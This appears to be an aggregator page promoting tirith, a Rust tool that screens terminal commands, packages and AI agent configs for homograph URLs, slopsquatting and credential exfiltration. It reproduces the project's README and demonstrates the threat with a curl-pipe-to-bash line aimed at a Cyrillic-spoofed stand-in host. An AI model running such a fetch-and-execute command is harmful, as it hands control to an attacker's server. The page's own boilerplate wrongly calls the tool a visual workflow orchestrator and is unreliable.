tirith Agent工作流 是 AI Skill Hub 本期精选Agent工作流之一。已获得 2.3k 颗 GitHub Star,综合评分 8.2 分,整体质量较高。我们强烈推荐将其纳入你的 AI 工具库,帮助提升工作效率。
tirith Agent工作流 是一套完整的 AI Agent 自动化工作流方案。通过可视化的节点编排,将复杂的多步骤任务拆解为清晰的自动化流程,实现全程无人值守的智能处理。支持与数百种外部服务和 API 无缝集成,适合构建数据处理管线、业务自动化和 AI 辅助决策系统。
tirith Agent工作流 是一套完整的 AI Agent 自动化工作流方案。通过可视化的节点编排,将复杂的多步骤任务拆解为清晰的自动化流程,实现全程无人值守的智能处理。支持与数百种外部服务和 API 无缝集成,适合构建数据处理管线、业务自动化和 AI 辅助决策系统。
# 方式一:cargo install(推荐) cargo install tirith # 方式二:从源码编译 git clone https://github.com/sheeki03/tirith cd tirith cargo build --release # 二进制在 ./target/release/tirith
# 查看帮助 tirith --help # 基本运行 tirith [options] <input> # 详细使用说明请查阅文档 # https://github.com/sheeki03/tirith
# tirith 配置说明 # 查看配置选项 tirith --config-example > config.yml # 常见配置项 # output_dir: ./output # log_level: info # workers: 4 # 环境变量(覆盖配置文件) export TIRITH_CONFIG="/path/to/config.yml"
Your browser would catch this. Your terminal won't.
<p align="center"> <img src="assets/cover.png" alt="tirith, terminal security" width="100%" /> </p>
Website | Docs | SKILL.md | Changelog | Releases
<a href="https://vercel.com/open-source-program"> <img alt="Vercel OSS Program" src="https://vercel.com/oss/program-badge-2026.svg" /> </a>
<sub>Independent open-source project, with hosting supported by the Vercel Open Source Program (Spring 2026 Cohort).</sub>
---
Can you spot the difference?
curl -sSL https://install.example-cli.dev | bash # safe
curl -sSL https://іnstall.example-clі.dev | bash # compromised
You can't. Neither can your terminal. Both і characters are Cyrillic (U+0456), not Latin i. The second URL resolves to an attacker's server. The script executes before you notice.
Browsers solved this years ago. Terminals still render Unicode, ANSI escapes, and invisible characters without question. AI agents run shell commands and install packages without inspecting what's inside.
Tirith stands at the gate. It intercepts commands, pasted content, and scanned files for homograph URLs, obfuscated payloads, credential exfiltration, malicious AI skills/configs, and known-bad packages/domains/IPs from a signed threat intelligence database before they execute.
brew install tirith
Then activate in your shell profile:
```bash
tirith ecosystem scan [path] is the directory-level companion to package risk. It walks a project, discovers every dependency manifest it understands, npm (package.json, package-lock.json), Python (requirements*.txt, pyproject.toml), Rust (Cargo.toml), Go (go.mod), Ruby (Gemfile), and scores every declared dependency with the same deterministic package_risk factor engine.
tirith ecosystem scan # scan the current project
tirith ecosystem scan ./my-project # scan a specific directory
tirith ecosystem scan --online ./my-project # also consult the registry API
tirith ecosystem scan --format json ./ # full machine-readable report
It folds in slopsquat detection. Slopsquatting is the registration of a plausible-but-fake name that LLMs tend to hallucinate as a dependency. ecosystem scan flags one only when all three hold: the name is not known-real or popular, it is shaped like an AI hallucination (a language prefix like python- / node- plus descriptive tokens, a stack of generic filler like helper / utils / client, or an unusually long name), and it sits near a real popular name (a one-edit near-miss, or it embeds a popular name as a word). Requiring all three keeps false positives low: an honest data-utils with no popular anchor does not fire.
Offline by default, opt-in --online. Name and typosquat signals come from the local threat database; --online adds registry provenance, gated and degraded exactly as package risk --online. This flag controls the ecosystem scan and does not alter tirith check's independent runtime-enrichment policy. Findings flow through tirith's normal Verdict / Finding model: explainable (tirith explain --rule threat_suspicious_package), audit-logged, and respecting the policy allowlist (an allowlisted package, by bare name or ecosystem:name, is suppressed). Exit codes match tirith scan: 1 for a blocking finding, 2 for advisory, 0 when clean.
This helps catch known-malicious packages, confirmed typosquats, slopsquatted package names, malicious download infrastructure, and packages with live OSV / CISA KEV advisory data.
Package-name risk is only one layer. Tirith can inspect the exact Python bytes you already have and, on supported hosts, enforce a hash-pinned install plan:
```bash
tirith pkg trust-tool /absolute/path/to/static-uv tirith pkg approve pip requests==2.31.0 --target .tirith-pkg tirith pkg install pip requests==2.31.0 --target .tirith-pkg tirith pkg verify-env --target .tirith-pkg requests ```
Inspection covers wheel structure and identity, RECORD integrity and file ownership, Python startup hooks, native ELF/Mach-O/PE extensions, execution edges, and loader/payload splits across distributions. pkg graph, pkg diff, pkg attest, and pkg receipt expose the corresponding provenance and receipt evidence.
The enforcing path supports pip on x86_64 Linux only and requires the documented native authority, a newly dedicated target directory, and an enrolled fully static native uv. Every unsupported platform fails closed before pip starts; it never falls back to an ordinary install. npm and Cargo remain non-enforcing evidence surfaces. See the 0.4.0 release notes and command reference.
Attack families tirith is built for (illustrative, not a caught-by-current-code claim):
| Incident | Year | Attack shape |
|---|---|---|
| [Shai-Hulud npm worm](https://socket.dev/blog/shai-hulud-worm) | 2025 | Self-propagating package malware; exfiltrated GitHub tokens and AWS keys from 180+ packages, published findings to public Shai-Hulud repos |
| [Slopsquatting](https://socket.dev/blog/slopsquatting-how-ai-hallucinations-are-fueling-a-new-class-of-supply-chain-attacks) | 2023 to ongoing | Attackers register LLM-hallucinated package names on npm / PyPI / crates.io; [USENIX 2025](https://www.usenix.org/system/files/conference/usenixsecurity25/sec25cycle1-prepub-742-spracklen.pdf) found 58% of hallucinated names repeat across runs |
| Team PCP / UNC1069 tooling | ongoing | Post-compromise credential sweeps, /proc/*/mem scraping, Docker privilege escalation |
| [colors.js / faker.js sabotage](https://snyk.io/blog/open-source-npm-packages-colors-faker/) | 2022 | Author self-sabotage of widely-used packages |
| [event-stream compromise](https://github.com/dominictarr/event-stream/issues/116) | 2018 | Transferred ownership to attacker; payload targeted Bitcoin wallets |
Package-name extraction currently covers language ecosystems (pip, npm/yarn/pnpm/bun, cargo, gem, go, composer, dotnet, mvn/gradle), not distro-level package managers (apt / dnf / yum / pacman). That's why xz-utils, which entered through Linux distro tarballs, is not in the table despite being a headline incident.
---
```
curl -fsSL -o tirith.tar.gz \ https://github.com/sheeki03/tirith/releases/latest/download/tirith-aarch64-unknown-linux-musl.tar.gz tar xzf tirith.tar.gz install -Dm755 tirith "$PREFIX/bin/tirith" tirith --version
Then activate the shell hook in `~/.bashrc` (Termux's default shell is bash):
bash eval "$(tirith init --shell bash)" # add to ~/.bashrc ```
[!NOTE] Termux support is best-effort. The musl artifact is built and smoke-tested in CI, but tirith is not yet continuously tested on a real Android device. If a hook misbehaves under Termux, please open an issue with tirith doctor output.
choco upgrade tirith ```
Chocolatey moderation can lag the GitHub release. Run choco info tirith to see the currently approved version. Use Scoop or a signed artifact from GitHub Releases when the newest release is required before Chocolatey moderation finishes.
tirith scan detects prompt injection and hidden payloads in AI config files. It prioritizes and scans 50+ known AI config file patterns:
.cursorrules, .windsurfrules, .clinerules, CLAUDE.md, copilot-instructions.md.claude/ settings, agents, skills, plugins, rules.cursor/, .vscode/, .windsurf/, .cline/, .continue/, .roo/, .codex/ configsmcp.json, .mcp.json, mcp_settings.json.github/copilot-instructions.md, .github/agents/*.mdWhat it catches in configs:
tirith package risk <ecosystem> <name> scores a package's supply-chain / maintainer risk the way tirith score scores a URL, a deterministic, fully explainable sum of named factors, no model and no learned weights. tirith package explain <ecosystem> <name> adds the factor-by-factor derivation; both take --format json.
tirith package risk npm react # 0/100, a known-popular package
tirith package risk npm reqeusts # high, one edit from a popular name
tirith package explain pypi flask # factor-by-factor derivation
tirith package risk npm left-pad --path ./node_modules/left-pad
tirith package risk --online npm react # also consult the registry API
Offline by default. With no flags, every signal is local, with no network call: (1) name vs. popular packages: known-popular, unknown, or a one-edit near-miss of a popular name (the classic typosquat/slopsquat shape), from the local threat database's popular set; (2) known malicious typosquat: an exact match in the threat DB's typosquat index; (3) install / lifecycle scripts and (4) bundled binary blobs, detected only when the package content is locally available (under node_modules / site-packages, or via --path). tirith never downloads the package.
--online adds registry provenance. It consults the package's registry (npm, PyPI, or crates.io) for six more factors in the same factor-sum model: package/version age, an established package with no owners, an abnormal version spike, very low downloads, a missing source repo, and yanked/deprecated status. It is the only path on which package risk itself reaches the network; tirith check and daemon mode have a separate, policy-controlled runtime enrichment path. --offline / TIRITH_OFFLINE force this scorer offline regardless. Failures fall back to the offline score with an honest api signals: unavailable, and responses are cached with a TTL so repeated runs do not hammer the registries.
The score is advisory and standalone: package risk is not a detection rule and changes no verdict, exit code, or audit log.
Debian / Ubuntu (.deb):
Download from GitHub Releases, then:
sudo dpkg -i tirith_*_amd64.deb
Fedora / RHEL / CentOS 8+ and Amazon Linux 2023 (.rpm):
Download from GitHub Releases, then:
sudo dnf install ./tirith-*.rpm
The Linux GNU release binaries target a GLIBC 2.28 ceiling. CI runs both x86_64 and aarch64 tarballs on AlmaLinux 8, Amazon Linux 2023, and Rocky Linux 9; the .deb and x86_64 .rpm contain those same canonical binaries.
Arch Linux (AUR):
```bash yay -S tirith
Oh-My-Zsh:
```bash git clone https://github.com/sheeki03/ohmyzsh-tirith \ ${ZSH_CUSTOM:-~/.oh-my-zsh/custom}/plugins/tirith
plugins=(... tirith) ```
Use tirith setup <tool> for one-command configuration. This is the complete named setup surface, including both the earlier integrations and the additions released in 0.4.0:
| Host | Setup | Protection layer installed by setup | Scope |
|---|---|---|---|
| Claude Code | tirith setup claude-code --with-mcp | Blocking PreToolUse; MCP optional | Project default or user |
| Cline | tirith setup cline | Blocking PreToolUse on POSIX and PowerShell, plus MCP; host runs the tool if the hook process fails | User only; hooks must be enabled in Cline |
| OpenAI Codex | tirith setup codex | MCP gateway; optional non-interactive zsh guard with --install-zshenv | User only |
| GitHub Copilot CLI | tirith setup copilot-cli | Blocking preToolUse hook | Project only; launch from repo root |
| Continue | tirith setup continue | MCP only | Project only |
| Cursor | tirith setup cursor | beforeShellExecution hook plus MCP gateway; optional zsh guard | Project default or user |
| Vercel Labs fx | tirith setup fx | MCP only | Trusted user profile only |
| Gemini CLI | tirith setup gemini-cli --with-mcp | Blocking BeforeTool; MCP optional | Project default or user |
| Grok Build | tirith setup grok-build | POSIX PreToolUse plus MCP; host can fail open on hook error/timeout | Project default or user |
| Kiro CLI | tirith setup kiro | Blocking agent-scoped preToolUse hook | Project default or user; the Tirith-enabled agent must be loaded |
| OMP / Oh My Pi | tirith setup omp | Blocking tool_call guard plus MCP | User/profile only |
| OpenClaw | tirith setup openclaw | Blocking before_tool_call plugin | Project default or user |
| OpenCode | tirith setup opencode | MCP only | Project default or user |
| OpenHands CLI | tirith setup openhands | POSIX pre_tool_use hook plus user MCP; host can fail open on hook error | User default; project hook also supported |
| Pi CLI | tirith setup pi-cli | Blocking tool_call extension | Project default or user |
| Prime Agent | tirith setup prime-agent | Blocking bash/IPython guard plus MCP | User only |
| Roo Code | tirith setup roo-code | MCP only | Project only |
| VS Code | tirith setup vscode | Workspace hook plus MCP gateway; optional zsh guard | Project only |
| Windsurf | tirith setup windsurf | pre_run_command hook plus MCP gateway; optional zsh guard | User only |
An MCP-only row exposes Tirith's tools but does not force the host to call them. A hook row is automatic only after the host has loaded the generated artifact and still honors its refusal contract. Run tirith doctor, restart the host, and perform the host-shaped allow/block check after setup and every upgrade. Full config paths, precedence rules, fail-open behavior, and verification steps are in the agent integration and trust matrix. See mcp/clients/ for the host-specific guides that are available.
GitHub Action with SARIF upload to GitHub Security tab:
- uses: sheeki03/tirith@v1
with:
fail_on: high
sarif: true
The action's pinned dependencies use the Node 24 action runtime. Self-hosted runners must use Actions Runner v2.327.1 or newer; GitHub-hosted runners already satisfy this requirement.
Also available as a pre-commit hook: see .pre-commit-hooks.yaml in this repo.
Scan supports --include, --exclude, --profile (loads named profiles from policy), and --ignore filters for targeted CI scanning.
tirith填补���AI工作流安全防护空白,针对同形字符攻击的解决方案业界罕见。Rust实现保证性能,2.3k星证明认可度。持续维护活跃,值得关注。
该工具使用 AGPL-3.0 协议,商用场景请仔细阅读协议条款,必要时咨询法律意见。
AI Skill Hub 为第三方内容聚合平台,本页面信息基于公开数据整理,不对工具功能和质量作任何法律背书。
建议在沙箱或测试环境中充分验证后,再部署至生产环境,并做好必要的安全评估。
⚠️ AGPL 3.0 — 最严格的 Copyleft,网络服务端使用也需开源,SaaS 使用受限。
经综合评估,tirith Agent工作流 在Agent工作流赛道中表现稳健,质量优秀。如果你已有明确的使用需求,可以直接上手体验;如果还在评估阶段,建议对比同类工具后再做决策。
| 原始名称 | tirith |
| 原始描述 | 开源AI工作流:Terminal security for developers and AI agents. Intercepts homograph URLs, pipe-。⭐2.3k · Rust |
| Topics | 终端安全同形攻击防护CLI工具开发者工具Rust项目 |
| GitHub | https://github.com/sheeki03/tirith |
| License | AGPL-3.0 |
| 语言 | Rust |
收录时间:2026-05-19 · 更新时间:2026-05-19 · License:AGPL-3.0 · AI Skill Hub 不对第三方内容的准确性作法律背书。
选择 Agent 类型,复制安装指令后粘贴到对应客户端